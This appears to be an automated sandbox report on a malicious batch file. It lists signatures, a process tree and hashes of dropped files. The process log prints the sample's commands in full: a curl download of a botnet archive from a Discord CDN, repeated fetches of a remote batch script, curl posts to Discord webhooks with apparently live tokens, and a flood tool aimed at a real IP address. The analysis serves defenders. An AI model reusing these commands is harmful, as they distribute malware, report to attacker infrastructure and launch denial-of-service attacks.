Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
-
submitted
18/08/2023, 02:50
General
-
Target
2.bat
-
Size
778B
-
MD5
a33d8f86256aa8f7a8cb7d42707ee267
-
SHA1
cda0d5614da462696a56f164cd091c01caa6b01b
-
SHA256
91d4f69edd266840e549e4470edb9c51289abf84c7f7e4ef22ce157c75932112
-
SHA512
e733a716b5e04fc97ca4c46b866b7ce21b9a9b27f7d2e6c7a4097b314a5f8bc883598f70026ff530a46b3f2d9439bc2154fc8d5ec746c0339e75b9c1c5ae3d85
Malware Config
Signatures
-
Contacts a large (7650) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Executes dropped EXE 3 IoCs
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Delays execution with timeout.exe 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 33 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -o botnet.zip https://cdn.discordapp.com/attachments/1134556559578517677/1141848588612276304/botney.zip2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'botnet.zip' -DestinationPath 'C:\Users\Admin\Desktop'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\forvmbox.exeforvmbox.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6F8E.tmp\6F8F.tmp\6F90.bat C:\Users\Admin\Desktop\forvmbox.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -s -o op.bat https://rentry.co/nfago/raw4⤵
-
-
C:\Windows\system32\curl.execurl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https http://88.198.48.45 36000 50 {}\", \"description\": \" Fri 08/18/2023-50 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy4⤵
-
-
C:\Users\Admin\Desktop\attacks\methods\https.exehttps.exe http://88.198.48.45 504⤵
- Executes dropped EXE
-
-
C:\Windows\system32\curl.execurl -s -o op.bat https://rentry.co/nfago/raw4⤵
-
-
C:\Windows\system32\timeout.exeTimeout /t 5 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\curl.execurl -s -o op.bat https://rentry.co/nfago/raw4⤵
-
-
C:\Windows\system32\curl.execurl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https http://88.198.48.45 37000 60 {}\", \"description\": \" Fri 08/18/2023-60 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy4⤵
-
-
C:\Users\Admin\Desktop\attacks\methods\https.exehttps.exe http://88.198.48.45 604⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com 2>NUL|find "Address:"2⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\system32\curl.execurl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{"content": "[ 2:51:12.85] BOT Connected to the api's 154.61.71.13 "}" https://discordapp.com/api/webhooks/1141892147268825178/IUMXKjBRDq-zmxzBqpZbXQgYYk64aCQAcwIC-bjly2VLNDVY2HwNkC-VMLnXgFk3UFVz2⤵
-
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com1⤵
-
C:\Windows\system32\find.exefind "Address:"1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5d5f935d0b2ddc1212f762ebe21bcb2ae
SHA159a320dce6123484a146bcdeac43277b39ca03cb
SHA2567a68493dbb79471fc0fa27ab7f57380d199fff07c881588c72819426c5c740d7
SHA51214864ebedaa6c1a6773dc768d9d5d3ed7f102d2aaaa6f09f32f5ee9a75ab738a256ca686c7b3e2f3b65e632610bff6e8cc26da10732b2546863cb94ec84fb76d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
292B
MD526836c2b013016cca81ca5a236dabbab
SHA13413b69afea3167c57898a9faa5f770480639949
SHA25605ca3f40c2bbe7b7ba52fbdfa552cd6a52de4e5200991562266bad2eb21fea45
SHA5124f37864888e1d1a244ba220775d5d0aa0a51de02dbc68a63bc8eba129142e0711a33bae48686debd5be88b410b86c7dcbf92a89c3bf93882d428861d2a6a50ec
-
Filesize
292B
MD526836c2b013016cca81ca5a236dabbab
SHA13413b69afea3167c57898a9faa5f770480639949
SHA25605ca3f40c2bbe7b7ba52fbdfa552cd6a52de4e5200991562266bad2eb21fea45
SHA5124f37864888e1d1a244ba220775d5d0aa0a51de02dbc68a63bc8eba129142e0711a33bae48686debd5be88b410b86c7dcbf92a89c3bf93882d428861d2a6a50ec
-
Filesize
292B
MD56e89c9322ed354ed0a64457571d45f73
SHA15897c112a143482d13e4f5848066093b24103a28
SHA256ff49f203af3d9403fa75964179d8cfb1ac1469befe2344cc3a441c809288d785
SHA5120cfc4b8447c69d0229ba473e99716600bd707d610498416658170ce9f9522ad692825bc7e33e6ef8889bf8d3cae1e53134d794b2fd5b38d179078c23a9845168
-
Filesize
35.9MB
MD570228b5cd219e39ddf20122c56b3866f
SHA1c3120ad1ca629d707a7220963ad2326c2b096f37
SHA256a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5
SHA512bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654
-
Filesize
35.9MB
MD570228b5cd219e39ddf20122c56b3866f
SHA1c3120ad1ca629d707a7220963ad2326c2b096f37
SHA256a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5
SHA512bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654
-
Filesize
35.9MB
MD570228b5cd219e39ddf20122c56b3866f
SHA1c3120ad1ca629d707a7220963ad2326c2b096f37
SHA256a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5
SHA512bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654
-
Filesize
35.9MB
MD570228b5cd219e39ddf20122c56b3866f
SHA1c3120ad1ca629d707a7220963ad2326c2b096f37
SHA256a5538de4385e4c1869e63cd3094e8d43efbae23377c153d9ef9ff772f169cfb5
SHA512bae73c538df3d574451963942048e639f8a1811e0498fd741dc23510dc0702ba5f6553381e81947e9da45059c8b2eda8db75e03dba54dea486c8c87c29a50654
-
Filesize
166KB
MD5c9ec822e89345dde18682eefc59f5277
SHA151886c4a2678d9b90d7254615b833c7183d7f846
SHA256a3f18997f21d6f962354e6c8addc46899f934d798b142e0d8adad976dfb8a5bc
SHA512191b2eedf88aa41e6d777bf63628c0417b7694d7dbf75e66f081242f950aba9beb29b3908496fe878f84e57ac7026c46f48d57f12becda525a311713019d2dd7
-
Filesize
186B
MD5bfd3d0748ac3a838d224d452d6d5959f
SHA19506c3eba5b8fa602290a75597e2ef720767c5d6
SHA25684ec21b7d8415b974e444e6e230a68a934719a7da452eb0f21ff4ff716e13ba5
SHA512bef9d23bf2a0a5811c51684e933dba127f817a8dc4b7a0deedbc53af9beb64ab245dfa722b94f10defcbe311b448a6e593173639adb4069d076104ad6848a680
-
Filesize
611KB
MD514e1ad3a0e97916d917ae0b6687cd200
SHA1d5154b85ad162f3f5714f9d578dfb4fca9b6af63
SHA2561a6de1acb8f22f98e2ada85b8cc4a9dab5233c16a60205c726e3366f1d6fc8ff
SHA51211ddcf49a59f11f619db09e39eb4deb4de80a2c1721452beac8df3cf1ec59c7b9193737beea078a297b6b79adbecf05342e3bac4af26ab9c6e9c60096d01b791
-
Filesize
102.2MB
MD585b96d8fc5082fcdfa23e010bf0e09b1
SHA10dc1081497ba72a3ed819a15ad5d5cd3e881d0ab
SHA25648e93dc99bc3464f3a7c1e9ca1b35084b267baf5087986360e711e65266e4d23
SHA512c3688c7e3135c81278c4952bf61aec38ef399f993ffb60d8939fe1e47d9b9adb54f87d14239beb98405d7d63378abfa075a906728c57de7f1dc52c27eea50789
-
Filesize
92KB
MD58c661213d9bbfb8a9a3d42c6b6cb7059
SHA19f795650dfbac6f49896026b047d16f3a0c16ec9
SHA2563a02fcf8821a21bafcdc5273eccce353036dd48ffd5c5f91a1d47e5a9fa243ce
SHA512d21b5b738857535c6eb181636ab78c08d872d33b5b18dff50ab694f6d1afe335db321767720a0a5ab056c3c03e98195dd4086f7eb8e21abf25ff3c0ac75bf0d4
-
Filesize
92KB
MD58c661213d9bbfb8a9a3d42c6b6cb7059
SHA19f795650dfbac6f49896026b047d16f3a0c16ec9
SHA2563a02fcf8821a21bafcdc5273eccce353036dd48ffd5c5f91a1d47e5a9fa243ce
SHA512d21b5b738857535c6eb181636ab78c08d872d33b5b18dff50ab694f6d1afe335db321767720a0a5ab056c3c03e98195dd4086f7eb8e21abf25ff3c0ac75bf0d4
-
Filesize
40KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
136KB